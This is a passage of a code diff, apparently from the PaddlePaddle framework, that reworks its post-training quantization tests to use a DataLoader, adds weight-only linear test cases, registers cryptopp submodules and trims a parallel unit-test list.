--- a/test/quantization/test_post_training_quantization_mobilenetv1.py
+++ b/test/quantization/test_post_training_quantization_mobilenetv1.py
@@ -25,6 +25,7 @@
 
 import paddle
 from paddle.dataset.common import download
+from paddle.io import Dataset
 from paddle.static.log_helper import get_logger
 from paddle.static.quantization import PostTrainingQuantization
 
@@ -116,6 +117,33 @@ def val(data_dir=DATA_DIR):
     return _reader_creator(file_list, 'val', shuffle=False, data_dir=data_dir)
 
 
+class ImageNetDataset(Dataset):
+    def __init__(self, data_dir=DATA_DIR, shuffle=False, need_label=False):
+        super().__init__()
+        self.need_label = need_label
+        self.data_dir = data_dir
+        val_file_list = os.path.join(data_dir, 'val_list.txt')
+        with open(val_file_list) as flist:
+            lines = [line.strip() for line in flist]
+            if shuffle:
+                np.random.shuffle(lines)
+            self.data = [line.split() for line in lines]
+
+    def __getitem__(self, index):
+        sample = self.data[index]
+        data_path = os.path.join(self.data_dir, sample[0])
+        data, label = process_image(
+            [data_path, sample[1]], mode='val', color_jitter=False, rotate=False
+        )
+        if self.need_label:
+            return data, np.array([label]).astype('int64')
+        else:
+            return data
+
+    def __len__(self):
+        return len(self.data)
+
+
 class TestPostTrainingQuantization(unittest.TestCase):
     def setUp(self):
         self.int8_download = 'int8/download'
@@ -267,7 +295,7 @@ def run_program(
         throughput = cnt / np.sum(periods)
         latency = np.average(periods)
         acc1 = np.sum(test_info) / cnt
-        return (throughput, latency, acc1)
+        return (throughput, latency, acc1, feed_dict)
 
     def generate_quantized_model(
         self,
@@ -284,6 +312,7 @@ def generate_quantized_model(
         batch_nums=1,
         onnx_format=False,
         deploy_backend=None,
+        feed_name="inputs",
     ):
         try:
             os.system("mkdir " + self.int8_model)
@@ -293,11 +322,30 @@ def generate_quantized_model(
 
         place = paddle.CPUPlace()
         exe = paddle.static.Executor(place)
-        val_reader = val()
+        image = paddle.static.data(
+            name=feed_name[0], shape=[None, 3, 224, 224], dtype='float32'
+        )
+        feed_list = [image]
+        if len(feed_name) == 2:
+            label = paddle.static.data(
+                name='label', shape=[None, 1], dtype='int64'
+            )
+            feed_list.append(label)
+
+        val_dataset = ImageNetDataset(need_label=len(feed_list) == 2)
+        data_loader = paddle.io.DataLoader(
+            val_dataset,
+            places=place,
+            feed_list=feed_list,
+            drop_last=False,
+            return_list=False,
+            batch_size=2,
+            shuffle=False,
+        )
 
         ptq = PostTrainingQuantization(
             executor=exe,
-            sample_generator=val_reader,
+            data_loader=data_loader,
             model_dir=model_path,
             model_filename=model_filename,
             params_filename=params_filename,
@@ -348,7 +396,12 @@ def run_test(
                 model, infer_iterations * batch_size
             )
         )
-        (fp32_throughput, fp32_latency, fp32_acc1) = self.run_program(
+        (
+            fp32_throughput,
+            fp32_latency,
+            fp32_acc1,
+            feed_name,
+        ) = self.run_program(
             model_path,
             model_filename,
             params_filename,
@@ -370,6 +423,7 @@ def run_test(
             batch_nums,
             onnx_format,
             deploy_backend,
+            feed_name,
         )
 
         _logger.info(
@@ -377,7 +431,7 @@ def run_test(
                 model, infer_iterations * batch_size
             )
         )
-        (int8_throughput, int8_latency, int8_acc1) = self.run_program(
+        (int8_throughput, int8_latency, int8_acc1, _) = self.run_program(
             self.int8_model,
             model_filename,
             params_filename,
@@ -421,7 +475,7 @@ def test_post_training_kl_mobilenetv1(self):
         is_use_cache_file = False
         is_optimize_model = True
         diff_threshold = 0.025
-        batch_nums = 1
+        batch_nums = 2
         self.run_test(
             model,
             'inference.pdmodel',
@@ -607,7 +661,7 @@ def test_post_training_onnx_format_mobilenetv1_tensorrt(self):
         is_optimize_model = False
         onnx_format = True
         diff_threshold = 0.05
-        batch_nums = 2
+        batch_nums = 12
         deploy_backend = "tensorrt"
         self.run_test(
             model,
@@ -650,7 +704,7 @@ def test_post_training_onnx_format_mobilenetv1_mkldnn(self):
         is_optimize_model = False
         onnx_format = True
         diff_threshold = 0.05
-        batch_nums = 1
+        batch_nums = 12
         deploy_backend = "mkldnn"
         self.run_test(
             model,
diff --git a/test/quantization/test_post_training_quantization_resnet50.py b/test/quantization/test_post_training_quantization_resnet50.py
index ca87f17572a4c3..895b2f170084dc 100644
--- a/test/quantization/test_post_training_quantization_resnet50.py
+++ b/test/quantization/test_post_training_quantization_resnet50.py
@@ -113,7 +113,7 @@ def run_program(
         throughput = cnt / np.sum(periods)
         latency = np.average(periods)
         acc1 = np.sum(test_info) / cnt
-        return (throughput, latency, acc1)
+        return (throughput, latency, acc1, feed_dict)
 
 
 class TestPostTrainingForResnet50ONNXFormat(TestPostTrainingForResnet50):
diff --git a/test/quantization/test_ptq.py b/test/quantization/test_ptq.py
index 29ef308bd0b54e..2c6c21d472665f 100644
--- a/test/quantization/test_ptq.py
+++ b/test/quantization/test_ptq.py
@@ -128,6 +128,48 @@ def test_convert(self):
         self.assertIsNotNone(results)
         paddle.disable_static()
 
+    def test_convert_2times(self):
+        quant_model, ptq = self._get_model_for_ptq()
+
+        image = paddle.rand([1, 1, 32, 32], dtype="float32")
+        converted_model = ptq.convert(quant_model)
+        converted_model = ptq.convert(converted_model)
+        out = converted_model(image)
+        self.assertIsNotNone(out)
+
+        observer_count = self._count_layers(
+            converted_model, AbsmaxObserverLayer
+        )
+        quanter_count = self._count_layers(converted_model, LinearQuanter)
+        dequanter_count = self._count_layers(converted_model, LinearDequanter)
+        self.assertEqual(observer_count, 0)
+        self.assertEqual(dequanter_count, 14)
+        self.assertEqual(quanter_count, 9)
+
+        save_path = os.path.join(self.temp_dir.name, 'int8_infer')
+        paddle.jit.save(converted_model, save_path, [image])
+
+        paddle.enable_static()
+        exe = paddle.static.Executor(paddle.CPUPlace())
+        main_program = paddle.static.Program()
+        startup_program = paddle.static.Program()
+        with paddle.static.program_guard(main_program, startup_program):
+            [
+                inference_program,
+                feed_target_names,
+                fetch_targets,
+            ] = paddle.static.load_inference_model(save_path, exe)
+        tensor_img = np.array(
+            np.random.random((1, 1, 32, 32)), dtype=np.float32
+        )
+        results = exe.run(
+            inference_program,
+            feed={feed_target_names[0]: tensor_img},
+            fetch_list=fetch_targets,
+        )
+        self.assertIsNotNone(results)
+        paddle.disable_static()
+
 
 if __name__ == '__main__':
     unittest.main()
diff --git a/test/quantization/test_weight_only_linear.py b/test/quantization/test_weight_only_linear.py
index 81f84f138e70b8..c7bbc1c6582676 100644
--- a/test/quantization/test_weight_only_linear.py
+++ b/test/quantization/test_weight_only_linear.py
@@ -399,5 +399,47 @@ def test_weightonly_linear_backward(self):
         np.testing.assert_allclose(quant_x.grad, x.grad, rtol=1e-3, atol=1e-3)
 
 
+@unittest.skipIf(
+    not core.is_compiled_with_cuda() or get_cuda_version() < 11020,
+    "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8",
+)
+class WeightOnlyLinearTestCase11(WeightOnlyLinearTestCase):
+    def config(self):
+        super().config()
+        self.dtype = 'float16'
+        self.weight_dtype = "int8"
+        self.in_features = 128
+        self.out_features = 288
+
+
+@unittest.skipIf(
+    not core.is_compiled_with_cuda() or get_cuda_version() < 11020,
+    "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8",
+)
+class WeightOnlyLinearTestCase12(WeightOnlyLinearTestCase):
+    def config(self):
+        super().config()
+        self.dtype = 'float16'
+        self.bias = False
+        self.weight_dtype = "int8"
+        self.in_features = 128
+        self.out_features = 288
+
+
+@unittest.skipIf(
+    not core.is_compiled_with_cuda()
+    or get_cuda_version() < 11020
+    or paddle.device.cuda.get_device_capability()[0] < 8,
+    "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8",
+)
+class WeightOnlyLinearTestCase13(WeightOnlyLinearTestCase):
+    def config(self):
+        super().config()
+        self.dtype = 'bfloat16'
+        self.weight_dtype = "int8"
+        self.in_features = 128
+        self.out_features = 288
+
+
 if __name__ == '__main__':
     unittest.main()
diff --git a/third_party/cryptopp b/third_party/cryptopp
new file mode 160000
index 00000000000000..9dcc26c58213ab
--- /dev/null
+++ b/third_party/cryptopp
@@ -0,0 +1 @@
+Subproject commit 9dcc26c58213abb8351fbb1b2a7a1d2c667366e4
diff --git a/third_party/cryptopp-cmake b/third_party/cryptopp-cmake
new file mode 160000
index 00000000000000..6d0666c457fbbf
--- /dev/null
+++ b/third_party/cryptopp-cmake
@@ -0,0 +1 @@
+Subproject commit 6d0666c457fbbf6f81819fd2b80f0cb5b6646593
diff --git a/tools/parallel_UT_rule.py b/tools/parallel_UT_rule.py
index 464fb9cc1cfe46..cbc97375fd869d 100755
--- a/tools/parallel_UT_rule.py
+++ b/tools/parallel_UT_rule.py
@@ -28,7 +28,6 @@
     'test_fc_gru_fuse_pass_cc',
     'device_worker_test',
     'test_custom_conj',
-    'infer_io_utils_tester',
     'test_transpose_bf16_mkldnn_op',
     'test_container',
     'cpu_helper_test',
@@ -73,7 +72,6 @@
     'test_pybind_interface',
     'test_io_save_load',
     'test_fusion_lstm_int8_mkldnn_op',
-    'test_benchmark',
     'test_protobuf',
     'test_tdm_sampler_op',
     'test_teacher_student_sigmoid_loss_op',
@@ -482,7 +480,6 @@
     'test_communicator_half_async',
     'test_dynrnn_gradient_check',
     'test_pool2d_bf16_mkldnn_op',
-    'test_table_printer',
     'test_framework_debug_str',
     'test_dist_fleet_ps2',
     'test_collective_scatter_api',
@@ -1926,7 +1923,6 @@
     'test_bpr_loss_op',
     'test_boxps',
     'test_bipartite_match_op',
-    'test_benchmark',
     'test_beam_search_op',
     'test_batch_sampler',
     'test_batch_norm_act_fuse_pass',
@@ -1970,7 +1966,6 @@
     'lodtensor_printer_test',
     'test_dispatch_jit',
     'inlined_vector_test',
-    'infer_io_utils_tester',
     'graph_to_program_pass_test',
     'graph_test',
     'graph_helper_test',
@@ -2176,7 +2171,6 @@
     'test_auto_parallel_api',
     'test_tensor_copy_from',
     'test_analyzer_capi_exp_xpu',
-    'test_table_printer',
     'test_egr_task_autocodegen',
     'test_static_save_load_bf16',
     'test_parallel_executor_run_cinn',